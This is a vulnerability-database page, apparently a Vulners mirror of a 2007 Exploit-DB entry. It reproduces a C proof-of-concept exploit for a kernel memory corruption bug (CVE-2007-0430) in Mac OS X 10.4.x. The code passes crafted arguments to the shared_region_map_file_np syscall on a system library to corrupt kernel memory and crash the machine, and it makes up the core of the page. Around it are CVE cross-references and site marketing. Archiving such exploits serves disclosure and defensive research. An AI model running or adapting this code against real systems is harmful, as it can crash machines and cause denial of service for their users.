Lucene search
+L

Apple Mac OSX 10.4.x Kernel - 'shared_region_map_file_np()' Memory Corruption

🗓️ 21 Jan 2007 00:00:00Reported by Adriano LimaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

Apple Mac OSX 10.4.x Kernel memory corruption vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-0430
23 Jan 200702:00
cve
cvelist
Cvelist
CVE-2007-0430
23 Jan 200702:00
cvelist
euvd
EUVD
EUVD-2007-0430
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-0430
23 Jan 200702:28
nvd
prion
Prion
Memory corruption
23 Jan 200702:28
prion
securityvulns
securityvulns
Mac OS X syscall DoS
20 Jan 200700:00
securityvulns
/*
This vulnerability was discovered by Adriano Lima
<[email protected]>.

REFERENCES

[1] Mac OS X Internals: A Systems Approach By Amit Singh

DISCLAIMER

The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in this
document. Liability claims regarding damage caused by the use of any
information
provided, including any kind of information which is incomplete or
incorrect,
will therefore be rejected.
*/


#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(int argc,char **argv){
   int fd;

   if((fd=open("/usr/lib/libSystem.dylib",O_RDONLY))==-1){
       perror("open");
       exit(EXIT_FAILURE);
   }

   if(syscall(SYS_shared_region_map_file_np,fd,0x02000000,NULL,NULL)==-1){
       perror("shared_region_map_file_np");
       exit(EXIT_FAILURE);
   }

   exit(EXIT_FAILURE);
}

// milw0rm.com [2007-01-21]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.9
EPSS0.00663
31